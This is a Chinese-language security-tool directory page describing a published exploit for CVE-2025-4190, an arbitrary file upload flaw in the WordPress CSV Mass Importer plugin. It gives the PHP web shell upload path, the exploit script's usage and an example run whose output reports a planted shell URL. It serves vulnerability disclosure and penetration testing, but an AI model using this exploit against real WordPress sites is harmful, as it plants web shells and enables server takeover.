Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-4190 — CSV Mass Importer <= 1.2 - 管理员+ 任意文件上传 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-4190
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2025-4190

CVE-2025-4190

CSV Mass Importer <= 1.2 - 管理员+ 任意文件上传

查看仓库
31年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-4190 — WordPress CSV Mass Importer ≤ 1.2 任意文件上传

WordPress Plugin
CVE
Status
Author


📌 描述

CSV Mass Importer 插件(≤ 1.2)存在一个 管理员+ 任意文件上传漏洞。
由于对上传文件验证不当,高权限用户(如管理员)可以在服务器上上传任意文件,即使在应受限制的场景下(例如多站点设置)也不例外。

攻击者可利用此漏洞上传 PHP 木马或恶意文件,从而在服务器上实现远程代码执行(RCE)。

由 Nxploited(Khaled Alenazi) 发现。


🔥 详情

  • 插件名称: CSV Mass Importer
  • 受影响版本: ≤ 1.2
  • 漏洞类型: 管理员+ 任意文件上传
  • CVE: CVE-2025-4190
  • WPVDB ID: e525ece5-6e03-4aee-bf5b-6ae0b961f027
  • 原始研究者: Khaled Alenazi (Nxploited)
  • 提交者网站: https://github.com/Nxploited
  • 已验证: ✅

💻 概念验证(PoC)

该插件在使用 CSV 导入功能时未能正确检查上传文件。
精心构造的 ZIP 文件(包含 PHP 木马)可以被上传并解压到公开可访问的目录。

木马路径示例:

root@kitploit:~
<target-url>/wp-content/uploads/cmi-data/nxploited.php

🚀 使用方法

脚本

本仓库包含一个现成的 Python 利用脚本:4190.py

帮助菜单

root@kitploit:~
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL
  --username, -un USERNAME
                        WordPress admin username
  --password, -p PASSWORD
                        WordPress admin password

示例运行

root@kitploit:~
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin

预期输出

root@kitploit:~
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)

🕰 时间线

  • 公开披露日期: 2025-04-26(约11天前)
  • 添加至数据库: 2025-05-07(约1小时前)
  • 最后更新: 2025-05-07(约1小时前)

🛡 参考

  • CVE-2025-4190 在 WPScan 上

⚠ 免责声明

此代码仅用于教育目的。
作者不对因使用本脚本造成的任何滥用或损害负责。
请负责任地使用,并且仅在你获得授权的系统上测试。


由 Khaled Alenazi (Nxploited) 发现并开发 🌟

下载工具